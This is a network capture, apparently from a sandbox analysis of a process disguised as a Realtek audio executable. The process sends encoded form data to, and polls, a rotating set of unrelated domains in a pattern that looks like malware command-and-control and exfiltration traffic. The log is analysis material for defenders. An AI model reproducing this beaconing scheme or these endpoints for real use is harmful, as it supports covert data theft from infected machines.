                                                                                        Data Ascii: Sb=WNSE6PSYy5E6OVa0m+Apf6gUuSUb0dRE7WeNd1A/DKNymchjIe7NfzjQtmV7nHom33vn2S4ZQTHwBocuoMRA4nETYAsSSOi4J5T59BXT4RmjhsHtVI4hmxT19mj2Mb4ex3cQPApU5u/hnHj9nw9FblJbT0FhK+ZQrW9pLwdTwYwvcLdGMFw0btJoFeSd84LerA==


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        46 | 192.168.11.20 | 49761 | 15.197.148.33 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:57:03.845204115 CET | 694 | OUT | POST /kr0d/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.outandaboutatlanta.net
                                                                                        Origin: http://www.outandaboutatlanta.net
                                                                                        Referer: http://www.outandaboutatlanta.net/kr0d/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:57:04.883649111 CET    73    IN    HTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                        47    192.168.11.20    49762    15.197.148.33    80    7500    C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp    Bytes transferred    Direction    Data
                                                                                        Dec 12, 2024 21:57:06.486993074 CET    1289    OUT    POST /kr0d/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.outandaboutatlanta.net
                                                                                        Origin: http://www.outandaboutatlanta.net
                                                                                        Referer: http://www.outandaboutatlanta.net/kr0d/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:57:06.487047911 CET    6554    OUT
                                                                                        Dec 12, 2024 21:57:06.617058992 CET    73    IN    HTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                        48    192.168.11.20    49763    15.197.148.33    80    7500    C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp    Bytes transferred    Direction    Data
                                                                                        Dec 12, 2024 21:57:09.125288963 CET    392    OUT    GET /kr0d/?Sb=bP6k54Oj/dVpOGyx/646OsJjlk1Lh7hM6WHpc10dBI59rbtyQ+CUKzevm31jgUF3ujuXywFddjnVFrAf6vJCnEwCXj5JR8KMKpXq1B6p4R6mvtq3C4oxnko=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.outandaboutatlanta.net
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:57:12.182336092 CET    378    IN    HTTP/1.1 200 OK
                                                                                        content-type: text/html
                                                                                        date: Thu, 12 Dec 2024 20:57:12 GMT
                                                                                        content-length: 257
                                                                                        connection: close
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Sb=bP6k54Oj/dVpOGyx/646OsJjlk1Lh7hM6WHpc10dBI59rbtyQ+CUKzevm31jgUF3ujuXywFddjnVFrAf6vJCnEwCXj5JR8KMKpXq1B6p4R6mvtq3C4oxnko=&Hsa=KVXAK1dJ22EyzD"}</script></head></html>


                                                                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                        49    192.168.11.20    49764    76.223.54.146    80    7500    C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp    Bytes transferred    Direction    Data
                                                                                        Dec 12, 2024 21:57:17.476542950 CET    644    OUT    POST /vhgo/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.bonheur.tech
                                                                                        Origin: http://www.bonheur.tech
                                                                                        Referer: http://www.bonheur.tech/vhgo/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:57:17.607647896 CET    73    IN    HTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                        50    192.168.11.20    49765    76.223.54.146    80    7500    C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp    Bytes transferred    Direction    Data
                                                                                        Dec 12, 2024 21:57:20.139900923 CET    664    OUT    POST /vhgo/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.bonheur.tech
                                                                                        Origin: http://www.bonheur.tech
                                                                                        Referer: http://www.bonheur.tech/vhgo/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:57:20.271025896 CET    73    IN    HTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                        51    192.168.11.20    49766    76.223.54.146    80    7500    C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp    Bytes transferred    Direction    Data
                                                                                        Dec 12, 2024 21:57:22.800879955 CET    2578    OUT    POST /vhgo/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.bonheur.tech
                                                                                        Origin: http://www.bonheur.tech
                                                                                        Referer: http://www.bonheur.tech/vhgo/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:57:22.800899982 CET    3867    OUT
                                                                                        Dec 12, 2024 21:57:22.800976038 CET    1289    OUT
                                                                                        Dec 12, 2024 21:57:22.801145077 CET    79    OUT
                                                                                        Dec 12, 2024 21:57:22.938852072 CET    73    IN    HTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                        52    192.168.11.20    49767    76.223.54.146    80    7500    C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp    Bytes transferred    Direction    Data
                                                                                        Dec 12, 2024 21:57:25.464919090 CET    382    OUT    GET /vhgo/?Hsa=KVXAK1dJ22EyzD&Sb=24NXdzG92oIiABHGu+ZQYkyVF3qsciAedndbjTecmy5pPhoyKbgcfd6NskqGmv23pLlxGGuv/szdXq+lWCLQY91EK5mjTLpxoUkNmweSZk21XKSgURGmp20= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.bonheur.tech
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:57:33.628042936 CET    378    IN    HTTP/1.1 200 OK
                                                                                        content-type: text/html
                                                                                        date: Thu, 12 Dec 2024 20:57:33 GMT
                                                                                        content-length: 257
                                                                                        connection: close
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Hsa=KVXAK1dJ22EyzD&Sb=24NXdzG92oIiABHGu+ZQYkyVF3qsciAedndbjTecmy5pPhoyKbgcfd6NskqGmv23pLlxGGuv/szdXq+lWCLQY91EK5mjTLpxoUkNmweSZk21XKSgURGmp20="}</script></head></html>


                                                                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                        53    192.168.11.20    49768    104.21.83.167    80    7500    C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp    Bytes transferred    Direction    Data
                                                                                        Dec 12, 2024 21:57:38.907548904 CET    650    OUT    POST /5juh/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.inbulkses.shop
                                                                                        Origin: http://www.inbulkses.shop
                                                                                        Referer: http://www.inbulkses.shop/5juh/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)


                                                                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                        54    192.168.11.20    49769    104.21.83.167    80    7500    C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp    Bytes transferred    Direction    Data
                                                                                        Dec 12, 2024 21:57:41.557610035 CET    670    OUT    POST /5juh/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.inbulkses.shop
                                                                                        Origin: http://www.inbulkses.shop
                                                                                        Referer: http://www.inbulkses.shop/5juh/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)


                                                                                        Session ID: 55, Source IP: 192.168.11.20, Source Port: 49770, Destination IP: 104.21.83.167, Destination Port: 80, PID: 7500, Process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp: Dec 12, 2024 21:57:44.197402000 CET, Bytes transferred: 2578, Direction: OUT, Data:
                                                                                        POST /5juh/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.inbulkses.shop
                                                                                        Origin: http://www.inbulkses.shop
                                                                                        Referer: http://www.inbulkses.shop/5juh/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb= [TRUNCATED]
                                                                                        Timestamp: Dec 12, 2024 21:57:44.197429895 CET, Bytes transferred: 5241, Direction: OUT, Data:
                                                                                        Data Ascii: uInHJk7grgEBASFmapCWywfVwJSn0nG3FSMwHQ+oCo47ssc4gXVt2VAPOypq07sfabCyzeOxF7/MzCMYpjenO9C9JHuaEJ9ULSFn5jhsmBzFUpFTRxjlYFSQRTRCCbmSz40VxdkQZOYLvC5SUF6v/MJ6blO2NYgVFEVWQME7Fxdp2a5sHUW6mC0H5rILuiUK9q4iHCkDk2d9yBRwu9Ao9tn6br1QeKao4eDwOOFhkk7v8TdAdvQ


                                                                                        Session ID: 56, Source IP: 192.168.11.20, Source Port: 49771, Destination IP: 104.21.83.167, Destination Port: 80
                                                                                        Timestamp: Dec 12, 2024 21:57:46.833236933 CET, Bytes transferred: 384, Direction: OUT, Data:
                                                                                        GET /5juh/?Sb=fBnyqhzI58/0qqn5K0IHu1zVTzK5FlfyZRuzvxuqSvPnsbI29xaXWUSjgesV5KpSdxDguhZQGIO0bb0sj0YKl6QMA8RyIBjzU5arC02cubFE1HnMLxW3shs=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.inbulkses.shop
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Timestamp: Dec 12, 2024 21:57:48.567513943 CET, Bytes transferred: 1289, Direction: IN, Data:
                                                                                        HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:57:48 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                        Link: <http://www.inbulkses.shop/wp-json/>; rel="https://api.w.org/"
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aL427pSCaGiXon%2BNbZQR5BOTl6VHcTdEe4J8qM27KYpoleezZJx4kaz6VaFPhpZmC6YXViNc%2Br1UMdk5Eexd1%2BTpPQqUaBveAisk58GnhH35QocY1lI9d0O9dVTxVd6uHWT%2BM1s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f10a0f41bfd7bd0-ATL
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114105&min_rtt=114105&rtt_var=57052&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=384&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Ascii: 7c9a<!DOCTYPE html><html lang="en-US" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /><link rel="profile" href="http:


                                                                                        Session ID: 57, Source IP: 192.168.11.20, Source Port: 49772, Destination IP: 85.159.66.93, Destination Port: 80
                                                                                        Timestamp: Dec 12, 2024 21:57:57.134584904 CET, Bytes transferred: 392, Direction: OUT, Data:
                                                                                        GET /4wxo/?Hsa=KVXAK1dJ22EyzD&Sb=AuCk/wTI7zW3ld/u5VGEHIK6Kt0n3LR9prPfFK+Yc5xTqeXBXJi84rbX4QtnNLSqr4pLPSODfOM24Q7oPb8nuPFT6GxcogJfnF2+8lDPhEW1adutoQ/De7w= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.tabyscooterrentals.xyz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Timestamp: Dec 12, 2024 21:57:57.389105082 CET, Bytes transferred: 225, Direction: IN, Data:
                                                                                        HTTP/1.1 404 Not Found
                                                                                        Server: nginx/1.14.1
                                                                                        Date: Thu, 12 Dec 2024 20:57:57 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close
                                                                                        X-Rate-Limit-Limit: 5s
                                                                                        X-Rate-Limit-Remaining: 19
                                                                                        X-Rate-Limit-Reset: 2024-12-12T20:58:02.2635220Z


                                                                                        Session ID: 58, Source IP: 192.168.11.20, Source Port: 49773, Destination IP: 194.9.94.86, Destination Port: 80
                                                                                        Timestamp: Dec 12, 2024 21:58:10.800822973 CET, Bytes transferred: 638, Direction: OUT, Data:
                                                                                        POST /2j93/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.milp.store
                                                                                        Origin: http://www.milp.store
                                                                                        Referer: http://www.milp.store/2j93/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=Yx2/0fygfFFegTdtcbq/mUxeNG15VYg2eQO9+ikCPVUjVvNh4q/wgMTt6w2srIqUl/icOZVYJ53kpdQPU+eu1WabmOySejiJJY/528GxgNRiQON28R1T8Wqf1V3e+8t1KNrfKCGR0Q5CEKaRJguC1h6xFYDET1LBvvSv6TElQXFmw40qp1rzeJlstPNmn427iA==
                                                                                        Timestamp: Dec 12, 2024 21:58:11.029601097 CET, Bytes transferred: 1289, Direction: IN, Data:
                                                                                        HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 12 Dec 2024 20:58:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.29
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]


                                                                                        Session ID: 59, Source IP: 192.168.11.20, Source Port: 49774, Destination IP: 194.9.94.86, Destination Port: 80
                                                                                        Timestamp: Dec 12, 2024 21:58:13.557180882 CET, Bytes transferred: 658, Direction: OUT, Data:
                                                                                        POST /2j93/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.milp.store
                                                                                        Origin: http://www.milp.store
                                                                                        Referer: http://www.milp.store/2j93/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=Yx2/0fygfFFemxJtQYC/uUxZRW15b4gyeQy9+jQSPm8jbu9h5r/whMTt1Q2pmoqDl/uUOctYJ5jkpZcPUJKt0GaZgOyUATiJJY/528D5gM1iQe9281pU9Wqcll3evMtxKNrpKDar0TRCEOKRIyKFvx6zBYCYeUiGhOCu1UkmfiFR1u5w0HfXda5ep/0Ol63g/BHEH2rtM2aqWrn4FXlVOnA=
                                                                                        Timestamp: Dec 12, 2024 21:58:13.791414022 CET, Bytes transferred: 1289, Direction: IN, Data:
                                                                                        HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 12 Dec 2024 20:58:13 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.29
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]


Session ID  Source IP      Source Port  Destination IP  Destination Port
60          192.168.11.20  49775        194.9.94.86     80
Timestamp                            Bytes transferred  Direction  Data
Dec 12, 2024 21:58:16.314723015 CET  1289               OUT        POST /2j93/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Content-Length: 7367
Connection: close
Host: www.milp.store
Origin: http://www.milp.store
Referer: http://www.milp.store/2j93/
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Dec 12, 2024 21:58:16.547846079 CET  1289               IN         HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 Dec 2024 20:58:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/8.1.29
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]


Session ID  Source IP      Source Port  Destination IP  Destination Port
61          192.168.11.20  49776        194.9.94.86     80
Timestamp                            Bytes transferred  Direction  Data
Dec 12, 2024 21:58:19.066488981 CET  380                OUT        GET /2j93/?Hsa=KVXAK1dJ22EyzD&Sb=Vzef3oWXaGELtgURWqqFi05KJy99TvY3Ax3n2w42PW1Tdv5T/46T0veVyj66+7X9h8HGTeoaGJDhn+MaRcWt91HqjtPUKRqQAZTb/tezorVLLvQhzmVaw3M= HTTP/1.1
Accept: */*
Accept-Language: en-US
Connection: close
Host: www.milp.store
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Dec 12, 2024 21:58:19.299500942 CET  1289               IN         HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 Dec 2024 20:58:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/8.1.29
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]


Session ID  Source IP      Source Port  Destination IP  Destination Port
62          192.168.11.20  49777        199.59.243.227  80
Timestamp                            Bytes transferred  Direction  Data
Dec 12, 2024 21:58:24.457531929 CET  668                OUT        POST /emhd/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Content-Length: 199
Connection: close
Host: www.vavada-official.buzz
Origin: http://www.vavada-official.buzz
Referer: http://www.vavada-official.buzz/emhd/
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Dec 12, 2024 21:58:24.589164019 CET  1289               IN         HTTP/1.1 200 OK
date: Thu, 12 Dec 2024 20:58:23 GMT
content-type: text/html; charset=utf-8
content-length: 1150
x-request-id: ec773953-24c7-4ba9-9360-c00964044290
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==
set-cookie: parking_session=ec773953-24c7-4ba9-9360-c00964044290; expires=Thu, 12 Dec 2024 21:13:24 GMT; path=/
connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google


Session ID  Source IP      Source Port  Destination IP  Destination Port
63          192.168.11.20  49778        199.59.243.227  80
Timestamp                            Bytes transferred  Direction  Data
Dec 12, 2024 21:58:27.124417067 CET  688                OUT        POST /emhd/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Content-Length: 219
Connection: close
Host: www.vavada-official.buzz
Origin: http://www.vavada-official.buzz
Referer: http://www.vavada-official.buzz/emhd/
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
